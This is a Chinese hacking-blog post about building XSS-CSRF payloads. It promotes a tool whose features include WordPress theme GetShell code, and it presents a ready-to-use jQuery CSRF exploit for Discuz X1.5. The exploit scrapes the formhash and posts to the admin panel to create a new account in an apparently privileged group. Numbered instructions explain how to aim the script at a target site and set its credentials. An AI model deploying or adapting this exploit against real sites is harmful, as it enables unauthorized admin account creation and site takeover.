记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

构造XSS-CSRF代码+Discuz添加用户EXP

2014-12-15 14:00

最近在研究各类XSS,自然少不了要构造各种CSRF. 构造这玩意其实很简单本地搭个环境 管理员登陆后对指定操作进行抓包,然后JS或FLASH来XXOO

转换功能很简单,但非常实用,XSS流行的年代,这功能也将成为常用不仅这样还省掉N多时间 post参数可能很多,手工构造不但费时且遗漏其中一个参数都有可能导致CSRF失败. 我问你怕了吗?

图片: 

功能: 
[+]EncodeDecode       Post提交代码(Flash/jQuery/Flash/Python/Perl/PHP)  20141208
[+]EncodeDecode       Python Post参数 与 常规Post参数 互转(方便写EXP)   20141208
[+]EncodeDecode       Flash  Post参数 与 常规Post参数 互转(XSS-CSRF用)  20141208
[+]EncodeDecode       jQuery Post参数 与 常规Post参数 互转(XSS-CSRF用)  20141206
[+]EncodeDecode       增加WordPress后台主题GetShell代码 + 右键菜单美化  20141203
[+]ExpDebug             增加右键复制 Web全部信息 Banner/IP/地址位置信息   20101202
[+]EncodeDecode       选中URL可右键使用 Firefox\Chrome\IE 浏览器打开    20141128
[+]DataOutput         正则截取数据(结果支持同时提取8个参数 灵活度更高)  20141128

 

Discuz X1.5   CSRF添加用户EXP


<script src="http://www.hackdig.com/jquery-1.4.1.min.js" type="text/javascript"></script>
<script type="text/javascript">
$(function () {

$.post("http://192.168.85.182/dz15/", function (data) {
var getFormHash = data.split('action=logout&amp;formhash=')[1].split('">')[0];
$.post("http://192.168.85.182/dz15/admin.php?action=members&operation=add", { formhash: getFormHash,scrolltop: "",anchor: "",newusername: "2cto",newpassword: "2cto",newemail: "2cto@xx.com",newgroupid: "10",emailnotify: "0",addsubmit: "%CC%E1%BD%BB"});

});
});
</script>

使用方法:

1.将以上的www.hackdig.com地址的jquery-1.4.1.min.js替换为自己搭建的地址

2.将192.168.85.182/dz15/替换为需要测试的目标站点的地址

3将2cto2cto2cto@xx.com 修改为自己需要添加的帐号密码邮箱

ps:如果还是有不懂的地方可以加入红黑联盟VIP会员后联系我们的技术客服,我们会第一时间回答任何技术问题

 

知识来源: www.2cto.com/Article/201412/360915.html

阅读:147856 | 评论:0 | 标签:xss exp CSRF discuz

想收藏或者和大家分享这篇好文章→复制链接地址

“构造XSS-CSRF代码+Discuz添加用户EXP”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词